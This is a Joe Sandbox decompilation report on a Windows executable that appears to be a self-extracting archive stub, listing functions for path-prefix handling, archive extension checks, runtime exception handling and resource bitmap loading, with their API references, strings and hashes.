0x00000000
0x00000000
0x00a3c1df
0x00a3c1e7
0x00a3c1e8
0x00a3c1eb
0x00a3c1ee
0x00a3c1f1
0x00a3c1f4
0x00a3c1fc
0x00a3c1fd
0x00a3c1fd
0x00a3c1ff
0x00000000
0x00000000
0x00a3c201
0x00a3c205
0x00a3c207
0x00a3c20c
0x00000000
0x00000000
0x00a3c20e
0x00a3c211
0x00a3c214
0x00a3c217
0x00a3c21a
0x00a3c21d
0x00000000
0x00000000
0x00000000
0x00a3c21d
0x00a3c226
0x00a3c227
0x00000000
0x00a3c227
0x00a3c158
0x00a3c159
0x00a3c15e
0x00a3c162
0x00a3c163
0x00a3c166
0x00a3c169
0x00a3c16d
0x00a3c16e
0x00a3c16e
0x00a3c172
0x00a3c175
0x00a3c178
0x00a3c17a
0x00000000
0x00000000
0x00a3c180
0x00a3c185
0x00a3c187
0x00000000
0x00000000
0x00a3c189
0x00a3c18c
0x00a3c18f
0x00000000
0x00000000
0x00000000
0x00a3c18f
0x00a3c19d
0x00a3c1ac
0x00a3c1ac
0x00a3c1ae
0x00000000
0x00000000
0x00a3c1a5
0x00a3c1a9
0x00a3c1a9
0x00a3c1a9
0x00a3c1b0
0x00a3c1b6
0x00a3c1b7
0x00000000
0x00a3c1b7
0x00a3c169
0x00a3c102

APIs

Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0

Part of subcall function 00A3B92D: _wcsrchr.LIBVCRUNTIME ref: 00A3B944

_wcslen.LIBCMT ref: 00A3C197
_wcslen.LIBCMT ref: 00A3C1DF

Strings

.rar, xrefs: 00A3C0E1, 00A3C134
.sfx, xrefs: 00A3C11A
.exe, xrefs: 00A3C10B

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: edd3f0af6f3fbb750e32de57e0fcf82251f66aec9cfc32902aa828c40a2f180a
Instruction ID: 89b2cf2dc3e8c500dc9c7b7b4af0ed8857bf58da76c041fb7332ade4776ca180
Opcode Fuzzy Hash: edd3f0af6f3fbb750e32de57e0fcf82251f66aec9cfc32902aa828c40a2f180a
Instruction Fuzzy Hash: 36415A26540351A6C735AF749D52A7BB3B8EF81764F104A0FFAD27B181FB604D82E3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A3BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00A3BB03(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				void* _t32;
				long _t34;
				void* _t40;
				void* _t55;
				signed short* _t62;
				void* _t65;
				intOrPtr _t67;
				signed short* _t68;
				intOrPtr _t69;

				E00A4EC50(0x1000);
				_t68 = _a4;
				_t70 =  *_t68;
				if( *_t68 == 0) {
					L21:
					__eflags = 0;
					return 0;
				}
				E00A3BC98(_t70, _t68);
				_t65 = E00A53E13(_t68);
				_t32 = E00A3BCC3(_t68);
				_t71 = _t32;
				if(_t32 == 0) {
					_t34 = GetCurrentDirectoryW(0x7ff,  &_v4100);
					__eflags = _t34;
					if(_t34 == 0) {
						goto L21;
					}
					__eflags = _t34 - 0x7ff;
					if(_t34 > 0x7ff) {
						goto L21;
					}
					__eflags = E00A3BD9D( *_t68 & 0x0000ffff);
					if(__eflags == 0) {
						E00A3B690(__eflags,  &_v4100, 0x800);
						_t40 = E00A53E13( &_v4100);
						_t67 = _a12;
						__eflags = _t67 - _t40 + _t65 + 4;
						if(_t67 <= _t40 + _t65 + 4) {
							goto L21;
						}
						E00A40602(_a8, L"\\\\?\\", _t67);
						E00A405DA(__eflags, _a8,  &_v4100, _t67);
						__eflags =  *_t68 - 0x2e;
						if(__eflags == 0) {
							__eflags = E00A3BD9D(_t68[1] & 0x0000ffff);
							if(__eflags != 0) {
								_t68 =  &(_t68[2]);
							}
						}
						L16:
						_push(_t67);
						L5:
						_push(_t68);
						L6:
						_push(_a8);
						E00A405DA(_t73);
						return 1;
					}
					_t14 = _t65 + 6; // 0x6
					_t67 = _a12;
					__eflags = _t67 - _t14;
					if(_t67 <= _t14) {
						goto L21;
					}
					E00A40602(_a8, L"\\\\?\\", _t67);
					__eflags = 0;
					_v4096 = 0;
					E00A405DA(0, _a8,  &_v4100, _t67);
					goto L16;
				}
				if(E00A3BC98(_t71, _t68) == 0) {
					_t55 = 0x5c;
					__eflags =  *_t68 - _t55;
					if( *_t68 != _t55) {
						goto L21;
					}
					_t62 =  &(_t68[1]);
					__eflags =  *_t62 - _t55;
					if( *_t62 != _t55) {
						goto L21;
					}
					_t69 = _a12;
					_t10 = _t65 + 6; // 0x6
					__eflags = _t69 - _t10;
					if(_t69 <= _t10) {
						goto L21;
					}
					E00A40602(_a8, L"\\\\?\\", _t69);
					E00A405DA(__eflags, _a8, L"UNC", _t69);
					_push(_t69);
					_push(_t62);
					goto L6;
				}
				_t2 = _t65 + 4; // 0x4
				_t73 = _a12 - _t2;
				if(_a12 <= _t2) {
					goto L21;
				} else {
					E00A40602(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L5;
				}
			}

0x00a3bb0b
0x00a3bb12
0x00a3bb16
0x00a3bb1a
0x00a3bc84
0x00a3bc84
0x00000000
0x00a3bc84
0x00a3bb21
0x00a3bb2e
0x00a3bb30
0x00a3bb35
0x00a3bb37
0x00a3bbc5
0x00a3bbcb
0x00a3bbcd
0x00000000
0x00000000
0x00a3bbd3
0x00a3bbd5
0x00000000
0x00000000
0x00a3bbe4
0x00a3bbe6
0x00a3bc2f
0x00a3bc3b
0x00a3bc45
0x00a3bc49
0x00a3bc4b
0x00000000
0x00000000
0x00a3bc56
0x00a3bc66
0x00a3bc6b
0x00a3bc6f
0x00a3bc7b
0x00a3bc7d
0x00a3bc7f
0x00a3bc7f
0x00a3bc7d
0x00a3bc1d
0x00a3bc1d
0x00a3bb62
0x00a3bb62
0x00a3bb63
0x00a3bb63
0x00a3bb66
0x00000000
0x00a3bb6b
0x00a3bbe8
0x00a3bbeb
0x00a3bbee
0x00a3bbf0
0x00000000
0x00000000
0x00a3bbff
0x00a3bc04
0x00a3bc06
0x00a3bc18
0x00000000
0x00a3bc18
0x00a3bb41
0x00a3bb74
0x00a3bb75
0x00a3bb78
0x00000000
0x00000000
0x00a3bb7e
0x00a3bb81
0x00a3bb84
0x00000000
0x00000000
0x00a3bb8a
0x00a3bb8d
0x00a3bb90
0x00a3bb92
0x00000000
0x00000000
0x00a3bba1
0x00a3bbaf
0x00a3bbb4
0x00a3bbb5
0x00000000
0x00a3bbb5
0x00a3bb43
0x00a3bb46
0x00a3bb49
0x00000000
0x00a3bb4f
0x00a3bb5a
0x00a3bb5f
0x00000000
0x00a3bb5f

APIs

_wcslen.LIBCMT ref: 00A3BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00A3A275,?,?,00000800,?,00A3A23A,?,00A3755C), ref: 00A3BBC5
_wcslen.LIBCMT ref: 00A3BC3B

Strings

\\?\, xrefs: 00A3BB52, 00A3BB99, 00A3BBF7, 00A3BC4E
UNC, xrefs: 00A3BBA7

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 427094ad6c6cae00ae905751498f88d97cbd6ccc490699d4da9dc5b1f37c0d51
Instruction ID: 2286a6a566d1d09c4309ba49c09db07eeedd8a777f8b1dc9bfca082935c9a838
Opcode Fuzzy Hash: 427094ad6c6cae00ae905751498f88d97cbd6ccc490699d4da9dc5b1f37c0d51
Instruction Fuzzy Hash: 3B41BF36410215BACF31AF60CD42EEA77BABF88390F008425FB54A3151EBB09E919A70

Uniqueness

Uniqueness Score: -1.00%

Function 00A531D6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 61%

			E00A531D6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed int _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				_t132 =  *_t96 - 0x80000003;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E00A52AEC(_t96, __ecx, __edx, _t113, _t121, _t132);
					_t133 =  *((intOrPtr*)(_t75 + 8));
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00A52AEC(_t96, __ecx, __edx, 0, _t121, _t133) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00A50961(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00A50894(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00A52DB1(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00A58D24(_t96, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					__eflags = _t78;
					if(_t78 == 0) {
						L41:
						_t80 = 1;
						__eflags = 1;
					} else {
						_t101 = _t78 + 8;
						__eflags =  *_t101;
						if( *_t101 == 0) {
							goto L41;
						} else {
							__eflags =  *_t111 & 0x00000080;
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0) {
								L23:
								_t97 = _t116[4];
								_t123 = 0;
								__eflags = _t78 - _t97;
								if(_t78 == _t97) {
									L33:
									__eflags =  *_t116 & 0x00000002;
									if(( *_t116 & 0x00000002) == 0) {
										L35:
										_t81 = _a8;
										__eflags =  *_t81 & 0x00000001;
										if(( *_t81 & 0x00000001) == 0) {
											L37:
											__eflags =  *_t81 & 0x00000002;
											if(( *_t81 & 0x00000002) == 0) {
												L39:
												_t123 = 1;
												__eflags = 1;
											} else {
												__eflags =  *_t111 & 0x00000002;
												if(( *_t111 & 0x00000002) != 0) {
													goto L39;
												}
											}
										} else {
											__eflags =  *_t111 & 0x00000001;
											if(( *_t111 & 0x00000001) != 0) {
												goto L37;
											}
										}
									} else {
										__eflags =  *_t111 & 0x00000008;
										if(( *_t111 & 0x00000008) != 0) {
											goto L35;
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										__eflags = _t98 -  *_t82;
										if(_t98 !=  *_t82) {
											break;
										}
										__eflags = _t98;
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											__eflags = _t99 -  *((intOrPtr*)(_t82 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												__eflags = _t99;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										__eflags = _t83;
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									__eflags = _t83;
									goto L31;
								}
							} else {
								__eflags =  *_t116 & 0x00000010;
								if(( *_t116 & 0x00000010) != 0) {
									goto L41;
								} else {
									goto L23;
								}
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x00a531d6
0x00a531d6
0x00a531dd
0x00a531e0
0x00a531e6
0x00a53305
0x00a531ec
0x00a531ec
0x00a531ed
0x00a531ee
0x00a531f5
0x00a531f8
0x00a531fb
0x00a53201
0x00a5320b
0x00a53230
0x00a53235
0x00a5323a
0x00a53301
0x00000000
0x00a53302
0x00a5323a
0x00a5320b
0x00a53240
0x00a53243
0x00a53246
0x00a5324c
0x00a53252
0x00a53264
0x00a53269
0x00a5326c
0x00a5326f
0x00a53272
0x00a53275
0x00a5327b
0x00a53281
0x00a53284
0x00a53287
0x00a53296
0x00a53297
0x00a53297
0x00a5329c
0x00a532af
0x00a532b1
0x00a532b6
0x00a532c1
0x00a532c3
0x00a532c5
0x00a532e1
0x00a532e6
0x00a532e9
0x00a532e9
0x00a532c1
0x00a532b6
0x00a532ef
0x00a532f0
0x00a532f3
0x00a532f6
0x00a532f9
0x00a532fc
0x00a53287
0x00000000
0x00a5327b
0x00a53306
0x00a5330b
0x00a5330f
0x00a53312
0x00a53313
0x00a53314
0x00a53315
0x00a53318
0x00a5331a
0x00a53392
0x00a53394
0x00a53394
0x00a5331c
0x00a5331c
0x00a5331f
0x00a53322
0x00000000
0x00a53324
0x00a53324
0x00a53327
0x00a5332a
0x00a53331
0x00a53331
0x00a53334
0x00a53336
0x00a53338
0x00a5336a
0x00a5336a
0x00a5336d
0x00a53374
0x00a53374
0x00a53377
0x00a5337a
0x00a53381
0x00a53381
0x00a53384
0x00a5338b
0x00a5338d
0x00a5338d
0x00a53386
0x00a53386
0x00a53389
0x00000000
0x00000000
0x00a53389
0x00a5337c
0x00a5337c
0x00a5337f
0x00000000
0x00000000
0x00a5337f
0x00a5336f
0x00a5336f
0x00a53372
0x00000000
0x00000000
0x00a53372
0x00a5338e
0x00a5333a
0x00a5333a
0x00a5333a
0x00a5333d
0x00a5333d
0x00a5333f
0x00a53341
0x00000000
0x00000000
0x00a53343
0x00a53345
0x00a53359
0x00a53359
0x00a53347
0x00a53347
0x00a5334a
0x00a5334d
0x00000000
0x00a5334f
0x00a5334f
0x00a53352
0x00a53355
0x00a53357
0x00000000
0x00000000
0x00000000
0x00000000
0x00a53357
0x00a5334d
0x00a53362
0x00a53362
0x00a53364
0x00000000
0x00a53366
0x00a53366
0x00a53366
0x00000000
0x00a53364
0x00a5335d
0x00a5335f
0x00a5335f
0x00000000
0x00a5335f
0x00a5332c
0x00a5332c
0x00a5332f
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5332f
0x00a5332a
0x00a53322
0x00a53395
0x00a53399
0x00a53399

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A531FB
CatchIt.LIBVCRUNTIME ref: 00A532E1
_abort.LIBCMT ref: 00A53306

Strings

RCC, xrefs: 00A53215
MOC, xrefs: 00A5320D

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: CatchEncodePointer_abort
String ID: MOC$RCC
API String ID: 3199926832-2084237596
Opcode ID: aa2e73bf74ffa075d0bc8776c05302860ada2c3d96b5256d077a10671786b577
Instruction ID: fa9b3e98fd81623d6dc5975f9d2a6b7c0cc438cd2f5d9f9daed93c912b880cea
Opcode Fuzzy Hash: aa2e73bf74ffa075d0bc8776c05302860ada2c3d96b5256d077a10671786b577
Instruction Fuzzy Hash: 4D416772900209AFDF15DF98CD81AEEBBB9BF88345F188059FD08A7221D335AA54DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A3B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00A3B991(void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				short _t13;
				signed int _t14;
				short* _t19;
				signed int _t20;
				void* _t22;
				signed short* _t26;
				signed int _t28;
				signed int _t30;

				_t19 = _a8;
				_t26 = _a4;
				 *_t19 = 0;
				_t10 = E00A3BC98(__eflags, _t26);
				_t20 =  *_t26 & 0x0000ffff;
				if(_t10 != 0) {
					return E00A34092(_t19, _a12, L"%c:\\", _t20);
				}
				_t28 = 0x5c;
				__eflags = _t20 - _t28;
				if(_t20 == _t28) {
					__eflags = _t26[1] - _t28;
					if(_t26[1] == _t28) {
						_push(_t28);
						_push( &(_t26[2]));
						_t10 = E00A522C6(_t20);
						_pop(_t22);
						__eflags = _t10;
						if(_t10 != 0) {
							_push(_t28);
							_push(_t10 + 2);
							_t13 = E00A522C6(_t22);
							__eflags = _t13;
							if(_t13 == 0) {
								_t14 = E00A53E13(_t26);
							} else {
								_t14 = (_t13 - _t26 >> 1) + 1;
							}
							__eflags = _t14 - _a12;
							asm("sbb esi, esi");
							_t30 = _t28 & _t14;
							E00A560C2(_t19, _t26, _t30);
							_t10 = 0;
							__eflags = 0;
							 *((short*)(_t19 + _t30 * 2)) = 0;
						}
					}
				}
				return _t10;
			}

0x00a3b992
0x00a3b999
0x00a3b99e
0x00a3b9a1
0x00a3b9a6
0x00a3b9ab
0x00000000
0x00a3b9bd
0x00a3b9c5
0x00a3b9c6
0x00a3b9c9
0x00a3b9cb
0x00a3b9cf
0x00a3b9d4
0x00a3b9d5
0x00a3b9d6
0x00a3b9dc
0x00a3b9dd
0x00a3b9df
0x00a3b9e4
0x00a3b9e5
0x00a3b9e6
0x00a3b9ed
0x00a3b9ef
0x00a3b9f9
0x00a3b9f1
0x00a3b9f5
0x00a3b9f5
0x00a3b9ff
0x00a3ba03
0x00a3ba05
0x00a3ba0a
0x00a3ba12
0x00a3ba12
0x00a3ba14
0x00a3ba14
0x00a3b9df
0x00a3b9cf
0x00000000

APIs

_swprintf.LIBCMT ref: 00A3B9B8

Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5

_wcschr.LIBVCRUNTIME ref: 00A3B9D6
_wcschr.LIBVCRUNTIME ref: 00A3B9E6

Strings

%c:\, xrefs: 00A3B9AE

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 451882a3267936f2fae341f9774b46302c95b8648a8dd61b48a39c5d69470e7e
Instruction ID: b429259e379ce381e4a3acef343717c2d632eec6ebcebd27afc7af320299f938
Opcode Fuzzy Hash: 451882a3267936f2fae341f9774b46302c95b8648a8dd61b48a39c5d69470e7e
Instruction Fuzzy Hash: 8A01F5639147117A9A306B758C42E6BA7ADEE967B1F40880AFA44D7092EB34D85483F1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4B6DD(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t13;
				void* _t15;
				signed int _t20;
				signed int _t21;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t35;

				_t35 = __fp0;
				_t23 = __edx;
				_t24 = LoadBitmapW( *0xa71028, 0x65);
				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
				if(_t24 != 0) {
					L2:
					GetObjectW(_t24, 0x18,  &_v28);
					L4:
					if(E00A4A5C6(_t31) != 0) {
						if(_t21 != 0) {
							_t28 = E00A4A6C2(0x66);
							if(_t28 != 0) {
								DeleteObject(_t24);
								_t24 = _t28;
							}
						}
						_t13 = E00A4A605(_v20);
						_t15 = E00A4A80C(_t23, _t35, _t24, E00A4A5E4(_v24), _t13);
						DeleteObject(_t24);
						_t24 = _t15;
					}
					return _t24;
				}
				_t24 = E00A4A6C2(0x65);
				_t31 = _t24;
				if(_t24 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
					goto L4;
				}
				goto L2;
			}

0x00a4b6dd
0x00a4b6dd
0x00a4b6f3
0x00a4b6f7
0x00a4b6fc
0x00a4b70b
0x00a4b712
0x00a4b728
0x00a4b72f
0x00a4b734
0x00a4b73d
0x00a4b741
0x00a4b744
0x00a4b74a
0x00a4b74a
0x00a4b741
0x00a4b74f
0x00a4b75f
0x00a4b767
0x00a4b76d
0x00a4b76f
0x00a4b775
0x00a4b775
0x00a4b705
0x00a4b707
0x00a4b709
0x00a4b71a
0x00a4b721
0x00000000
0x00a4b721
0x00000000

APIs

LoadBitmapW.USER32(00000065), ref: 00A4B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00A4B712
DeleteObject.GDI32(00000000), ref: 00A4B744
DeleteObject.GDI32(00000000), ref: 00A4B767

Part of subcall function 00A4A6C2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6D5
Part of subcall function 00A4A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A6EC
Part of subcall function 00A4A6C2: LoadResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A703
Part of subcall function 00A4A6C2: LockResource.KERNEL32(00000000,?,?,?,00A4B73D,00000066), ref: 00A4A712
Part of subcall function 00A4A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A4B73D,00000066), ref: 00A4A72D
Part of subcall function 00A4A6C2: GlobalLock.KERNEL32 ref: 00A4A73E
Part of subcall function 00A4A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A4A7A7
Part of subcall function 00A4A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00A4A7C6
Part of subcall function 00A4A6C2: GlobalFree.KERNEL32 ref: 00A4A7CD

Strings

], xrefs: 00A4B71A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 92a21d9f2258dfd89bc474b5f8fd5cdc38757e8df78e84772c8d3802e7b70ee8
Instruction ID: e4f97f19462ad82930ec76f3052a327fbd0a021150d9c62d200dd5090d9b4149
Opcode Fuzzy Hash: 92a21d9f2258dfd89bc474b5f8fd5cdc38757e8df78e84772c8d3802e7b70ee8
Instruction Fuzzy Hash: 2201F93E641101A7CB11B7B45D09ABF7AB99FD0752F150011F900A7291DF31CD064272

Uniqueness

Uniqueness Score: -1.00%

Function 00A57E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A57E24,?,?,00A57DC4,?,00A6C300,0000000C,00A57F1B,?,00000002), ref: 00A57E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A57EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00A57E24,?,?,00A57DC4,?,00A6C300,0000000C,00A57F1B,?,00000002,00000000), ref: 00A57EC9

Strings

CorExitProcess, xrefs: 00A57E9E
mscoree.dll, xrefs: 00A57E8C

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 165cc919ced9519685c17504e77f389f66d5a67ea941f4bb20159de4611ec821
Instruction ID: 0e9c1c7218021a7e9317a46875a2cbc97626ad8b023cf05faf3e5b5719028a17
Opcode Fuzzy Hash: 165cc919ced9519685c17504e77f389f66d5a67ea941f4bb20159de4611ec821
Instruction Fuzzy Hash: 35F04475904208BBCF11DFA4DC09B9EBFB8FF44712F0141A9FC05A2150DB709E46CA90

Uniqueness

Uniqueness Score: -1.00%

